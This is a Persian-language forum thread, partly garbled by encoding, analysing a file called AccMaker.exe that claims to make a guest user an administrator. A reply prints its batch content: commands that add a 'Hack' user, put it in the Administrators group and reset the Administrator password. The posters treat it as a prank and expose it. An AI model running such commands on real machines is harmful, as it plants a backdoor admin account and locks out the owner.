اطلاعیه

Collapse
No announcement yet.

آنالیز؛ اجرا کن اکانت ادمین شو

Collapse
X

• Filter
  • زمان
  • Show
Clear All
new posts

• آنالیز؛ اجرا Ú©Ù† اکانت ادمین شو

چند وقته هر جا میری از این ابزار حرف میزنن و تو مطالبشون اسم بردن ؛ چند وقت پیش من یه فایل گرفتم گفته بود اگر یوزر guest هم هستید میتنونید بعد از اجرا کردن این برنامه به ادمین تبدیل بشین !

من امروز یکی از اونا رو ضمیمه کردم، بچه های برنامه نویس بهتر میتونن نظر بدن، من که میگم خیلی مشکوکه !
    فایل های پیوست شده
    CCNA, CCNP RnSnT, MCTS, MCSA, MCITP, MCITP:Messaging
    Next Goals: CCIE RnS, CEHv7
    www.resort.ir

کد:
    just a JOKE!
    this is a Batch file that converted to COM file by Bat2Com tool
    then renamed to AccMaker.exe

crlds3d.dll is a Joke in Joke : Sensaura, MacroFX, ZoomFX

@Echo off
    REM Coded By Arash in Vbasic
    REM Arash_Pursadr 1385-1386-2007
    NET uSeR Hack /aDd
    NET lOcAlGrOuP aDmInIsTrAtOrS Hack /AdD
    NET uSeR AdMiNiStRaToR hacked

Comment

يكم سر به سر مجيك بزارم

8- زبان مورد استفاده این فروم فارسی میباشد . استفاده از روش Pinglish یا تایپ فارسی با حروف انگلیسی در این فروم _تحت هر شرایطی_ ممنوع میباشد ! در صورتی که امکان تایپ فارسی را به هر دلیل ندارید ، میتوانید ارسال مطلب / سوال خود را به زمانی که این امکان را داشتید موکول کنید .
      در صورت مشاهده چنین مواردی ؛ بدون در نظر گرفتن محتوای مطلب ، پست مربوطه پاک خواهد شد.

Comment

این روشها فقط زمانی جواب میدن که ادمین بعد از شما یک بار سیستم رو بالا بیاره البطه بجز سرویس پک های قدیمی
        خونه
        www.parspishro.ir
        ذهن آشفته ای من
        www.literature.blogfa.com

Comment

نوشته اصلی توسط nasim نمایش پست ها
          يكم سر به سر مجيك بزارم

8- زبان مورد استفاده این فروم فارسی میباشد . استفاده از روش Pinglish یا تایپ فارسی با حروف انگلیسی در این فروم _تحت هر شرایطی_ ممنوع میباشد ! در صورتی که امکان تایپ فارسی را به هر دلیل ندارید ، میتوانید ارسال مطلب / سوال خود را به زمانی که این امکان را داشتید موکول کنید .
          در صورت مشاهده چنین مواردی ؛ بدون در نظر گرفتن محتوای مطلب ، پست مربوطه پاک خواهد شد.
          حاجی ما اسم اینو میزاریم شوخی دوستای قدیمی با همدیگه:D
          راحت باشین!
          ابزار های شبکه
          آموزش شبکه
          کاملترین آموزش کرک
          sigpic
          خاطراتی طنز از جنگ

کاملترین مرجع حملات تزریقی Sql injection

Comment

آحه یه موضوع دیگه هست اونم اینه که مشهورترین سایتها که 200 هزارتا یوزر اکتیو دارن تو قسمت vip معرفی میکنن از این ابزارا

راهی برای پیچوندن محدودیت هست واقعاً البته بغیر از روش های من در اوردی و ....
            CCNA, CCNP RnSnT, MCTS, MCSA, MCITP, MCITP:Messaging
            Next Goals: CCIE RnS, CEHv7
            www.resort.ir

Comment

نوشته اصلی توسط nasim نمایش پست ها
              يكم سر به سر مجيك بزارم

Its English not Pinglish

Comment

Working...
              X